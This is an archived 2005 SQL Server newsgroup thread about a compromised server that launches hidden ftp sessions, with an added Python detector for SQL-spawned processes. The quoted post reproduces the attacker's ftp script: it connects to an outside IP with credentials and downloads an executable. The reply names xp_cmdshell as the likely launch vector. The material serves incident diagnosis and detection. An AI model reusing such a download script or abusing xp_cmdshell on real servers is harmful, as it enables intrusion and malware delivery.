RE: malicious process...
From: Mike Epprecht (SQL MVP) (mike_at_epprecht.net)
Date: 04/28/05
- Next message: Alex: "Urgent question SQL Server"
- Previous message: François G.: "malicious process..."
- In reply to: François G.: "malicious process..."
Date: Thu, 28 Apr 2005 04:42:02 -0700
Hi
xp_cmdshell or xp_oa* are capable of doing this.
Regards
--------------------------------
Mike Epprecht, Microsoft SQL Server MVP
Zurich, Switzerland
MVP Program: http://www.microsoft.com/mvp
Blog: http://www.msmvps.com/epprecht/
"François G." wrote:
> Hi,
>
> Since I installed a firewall on my machine, it regularly
> detects unexpected ftp sessions.
>
> Thanks to a process explorer, I remarked that ftp is
> launched from a (hidden) cmd.exe, itself launched by
> sql.exe (for your info, the ftp command line is : "ftp -n
> -s:???.txt" where ???.txt is a textfile in \system32\ ).
>
> What SQL subsystem is able to launch such a process? a
> stored procedure? a trigger? (fyi, SQLAgent is not
> running). How can I prevent this to occur?
>
> Thank you for your help,
>
> François
>
>
> Note - contents of the textfile :
>
> open 81.244.183.229 19470
> user itqavjflw itqavjflw
> get SCardClnt.exe
> quit
>
>
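Detection logic for the process chain described in the quoted post (a SQL Server process starting cmd.exe, which starts a scripted ftp), added here as an example and not part of either poster's message. The record layout, the image-name lists and the sample events are constructed assumptions; real input would come from whatever process-creation logging the host has.

```python
from ntpath import basename  # parses Windows paths on any OS

# Assumption: engine image names; "sql.exe" is the name reported in the post.
SQL_IMAGES = {"sqlservr.exe", "sql.exe"}
CHILD_IMAGES = {"cmd.exe", "ftp.exe", "tftp.exe", "powershell.exe", "cscript.exe", "wscript.exe"}

# Constructed process-creation records: (pid, parent pid, image path, command line).
EVENTS = [
    (400, 4, r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe", "sqlservr.exe -s MSSQLSERVER"),
    (1312, 400, r"C:\WINDOWS\system32\cmd.exe", r"cmd.exe /c ftp -n -s:C:\WINDOWS\system32\x.txt"),
    (1320, 1312, r"C:\WINDOWS\system32\ftp.exe", r"ftp -n -s:C:\WINDOWS\system32\x.txt"),
    (2000, 900, r"C:\WINDOWS\explorer.exe", "explorer.exe"),
    (2044, 2000, r"C:\WINDOWS\system32\cmd.exe", "cmd.exe"),
    (2050, 2044, r"C:\WINDOWS\system32\ftp.exe", "ftp ftp.example.com"),
]

def image_name(path):
    return basename(path).lower()

def sql_ancestor(pid, procs):
    """Return the pid of the nearest SQL Server ancestor, or None."""
    seen = set()  # guards against loops caused by pid reuse in the log
    ppid = procs[pid][0]
    while ppid in procs and ppid not in seen:
        seen.add(ppid)
        if image_name(procs[ppid][1]) in SQL_IMAGES:
            return ppid
        ppid = procs[ppid][0]
    return None  # parent chain ended (or looped) without reaching SQL Server

def find_sql_spawned(events):
    """Flag shells and transfer tools that descend from the database engine."""
    procs = {pid: (ppid, image, cmd) for pid, ppid, image, cmd in events}
    alerts = []
    for pid, (ppid, image, cmd) in procs.items():
        if image_name(image) not in CHILD_IMAGES:
            continue
        root = sql_ancestor(pid, procs)
        if root is not None:
            low = cmd.lower()
            alerts.append({"pid": pid, "image": image_name(image), "sql_pid": root,
                           "scripted_ftp": "ftp" in low and "-s:" in low})
    return alerts

if __name__ == "__main__":
    for alert in find_sql_spawned(EVENTS):
        print(alert)
```

The interactive cmd.exe and ftp.exe started from explorer.exe are not flagged; only the two processes whose ancestry reaches the SQL Server process are.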